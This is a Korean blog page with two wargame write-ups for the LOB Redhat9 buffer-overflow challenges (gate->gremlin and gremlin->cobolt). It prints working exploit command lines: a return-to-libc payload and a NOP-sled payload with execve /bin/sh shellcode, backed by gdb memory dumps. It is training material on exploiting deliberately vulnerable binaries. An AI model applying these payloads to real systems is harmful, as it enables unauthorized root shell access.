실제로 많은 분들이 환경변수를 이용해서 풀고있지만, system함수를 이용해서 풀어보겠다.

0x40058ae0이 system함수의 주소이다.

이제 인자로 쓸 /bin/sh의 주소를 찾아보자...

다음은 /bin/sh의 주소를 찾을 소스다.

저렇게해서 돌렸더니 주소가 나온다.

그리고 간략하게 페이로드를 구성해보자면

[buffer + ebp (20bytes)] + [ret (4bytes)] + [dummy (4bytes)] + [argument (4bytes)] 가 된다.

실제로 페이로드 짠것이다.

./cobolt $(python -c 'print "a"*20+"\xe0\x8a\x05\x

40"+"aaaa"+"\xf9\xbf\x0f\x40"')

결과를 봐보자.

clear!!

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

orge -> troll (0)	2014.02.20
darkelf->orge (0)	2014.02.20
wolfman -> darkelf (0)	2014.02.20
orc -> wolfman (0)	2014.02.20
gate -> gremlin (0)	2014.02.20

Posted by windowhan

,

gate -> gremlin

Wargame/LOB (Redhat9) 2014. 2. 20. 15:09

쉘코드가 들어가는 전형적인 Buffer Overflow 해킹 문제이다.

simple BOF라고 해서, 처음에 구버전인 RedHat 6.2에서 root권한을 따기위해서 아등바등 했었던것이 기억이 난다.

buffer의 크기는 256.

간단하게 payload 구성을 보자.

[buffer (256 bytes)] + [ebp (4bytes)] + [ret (4bytes) ]

간단하게 페이로드를 구성을 해보았다.

buffer부터 ebp까지는 260bytes이다.

그러니 그 안에 nop slide와 shellcode를 집어넣으면 된다.

payload는 다음과 같다.

$(python -c 'print "\x90"*200 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x90"*36

nop slide는 다음 명령어로 계속 차례를 넘기는 기능을 수행하니 대충 90이 위치한 자리를 ret에 덮으면 된다.

(gdb) x/100x $esp-100

0xbffffbb8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbc8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbd8: 0x90909090 0x90909090 0x6850c031 0x68732f2f

0xbffffbe8: 0x69622f68 0x50e3896e 0x99e18953 0x80cd0bb0

0xbffffbf8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc08: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc18: 0x90909090 0x4000fdf4 0x00000002 0xbffffc64

0xbffffc28: 0xbffffc70 0x40013868 0x00000002 0x08048380

0xbffffc38: 0x00000000 0x080483a1 0x08048430 0x00000002

0xbffffc48: 0xbffffc64 0x080482e0 0x080484bc 0x4000ae60

0xbffffc58: 0xbffffc5c 0x40013e90 0x00000002 0xbffffd50

0xbffffc68: 0xbffffd67 0x00000000 0xbffffe6e 0xbffffe90

0xbffffc78: 0xbffffe9a 0xbffffea8 0xbffffec7 0xbffffed4

0xbffffc88: 0xbffffeed 0xbfffff07 0xbfffff11 0xbfffff1f

0xbffffc98: 0xbfffff5f 0xbfffff6f 0xbfffff84 0xbfffff94

0xbffffca8: 0xbfffff9e 0xbfffffba 0xbfffffc5 0xbfffffd2

0xbffffcb8: 0xbfffffda 0x00000000 0x00000003 0x08048034

0xbffffcc8: 0x00000004 0x00000020 0x00000005 0x00000006

0xbffffcd8: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffce8: 0x00000008 0x00000000 0x00000009 0x08048380

0xbffffcf8: 0x0000000b 0x000001f4 0x0000000c 0x000001f4

0xbffffd08: 0x0000000d 0x000001f4 0x0000000e 0x000001f4

0xbffffd18: 0x00000010 0x0febfbff 0x0000000f 0xbffffd4b

0xbffffd28: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd38: 0x00000000 0x00000000 0x00000000 0x00000000

(gdb)

0xbffffd48: 0x69000000 0x00363836 0x6d6f682f 0x61672f65

0xbffffd58: 0x742f6574 0x672f706d 0x6c6d6572 0x90006e69

0xbffffd68: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd78: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd88: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd98: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffda8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdb8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdc8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdd8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffde8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdf8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe08: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe18: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe28: 0x90909090 0x31909090 0x2f6850c0 0x6868732f

0xbffffe38: 0x6e69622f 0x5350e389 0xb099e189 0x9080cd0b

0xbffffe48: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe58: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe68: 0xf4909090 0x454c00fd 0x504f5353 0x7c3d4e45

0xbffffe78: 0x7273752f 0x6e69622f 0x73656c2f 0x70697073

0xbffffe88: 0x68732e65 0x00732520 0x52455355 0x454d414e

0xbffffe98: 0x4948003d 0x49535453 0x313d455a 0x00303030

0xbffffea8: 0x54534f48 0x454d414e 0x636f6c3d 0x6f686c61

0xbffffeb8: 0x6c2e7473 0x6c61636f 0x616d6f64 0x4c006e69

0xbffffec8: 0x414e474f 0x673d454d 0x00657461 0x4f4d4552

(gdb)

0xbffffed8: 0x4f484554 0x353d5453 0x36322e39 0x3931312e

0xbffffee8: 0x3636312e 0x49414d00 0x762f3d4c 0x732f7261

0xbffffef8: 0x6c6f6f70 0x69616d2f 0x61672f6c 0x54006574

0xbfffff08: 0x3d4d5245 0x69736e61 0x534f4800 0x50595454

0xbfffff18: 0x33693d45 0x50003638 0x3d485441 0x7273752f

0xbfffff28: 0x636f6c2f 0x622f6c61 0x2f3a6e69 0x3a6e6962

0xbfffff38: 0x7273752f 0x6e69622f 0x73752f3a 0x31582f72

0xbfffff48: 0x2f365231 0x3a6e6962 0x6d6f682f 0x61672f65

0xbfffff58: 0x622f6574 0x48006e69 0x3d454d4f 0x6d6f682f

0xbfffff68: 0x61672f65 0x49006574 0x5455504e 0x2f3d4352

0xbfffff78: 0x2f637465 0x75706e69 0x00637274 0x4c454853

0xbfffff88: 0x622f3d4c 0x622f6e69 0x00687361 0x52455355

0xbfffff98: 0x7461673d 0x41420065 0x455f4853 0x2f3d564e

0xbfffffa8: 0x656d6f68 0x7461672f 0x622e2f65 0x72687361

0xbfffffb8: 0x414c0063 0x653d474e 0x53555f6e 0x54534f00

0xbfffffc8: 0x3d455059 0x756e694c 0x48530078 0x3d4c564c

0xbfffffd8: 0x534c0031 0x4c4f435f 0x3d53524f 0x6f682f00

0xbfffffe8: 0x672f656d 0x2f657461 0x2f706d74 0x6d657267

0xbffffff8: 0x006e696c 0x00000000 Cannot access memory at address

0xc0000000

대충 리턴어드레스를 0xbffffdf8로 잡아주자...

그러면 페이로드가 완성된다.

./gremlin $(python -c 'print "\x90"*200 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x90"*36+"\xf8\xfd\xff\xbf"')

성공!

괜히 귀찮게 쉘코드로 풀었네...

구버전인거 알았으니 별도의 프로텍션이 없으면 원샷으로 뚜러버려!

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

orge -> troll (0)	2014.02.20
darkelf->orge (0)	2014.02.20
wolfman -> darkelf (0)	2014.02.20
orc -> wolfman (0)	2014.02.20
gremlin -> cobolt (0)	2014.02.20

Posted by windowhan

,

windowhan lab

'Wargame'에 해당되는 글 30건

golem -> darkknight

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

skeleton -> golem

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

vampire -> skeleton

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

troll -> vampire

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

orge -> troll

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

darkelf->orge

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

wolfman -> darkelf

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

orc -> wolfman

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

gremlin -> cobolt

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

gate -> gremlin

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

카테고리

태그목록

최근에 올라온 글

최근에 달린 댓글

최근에 받은 트랙백

글 보관함

달력

링크

티스토리툴바


	by windowhan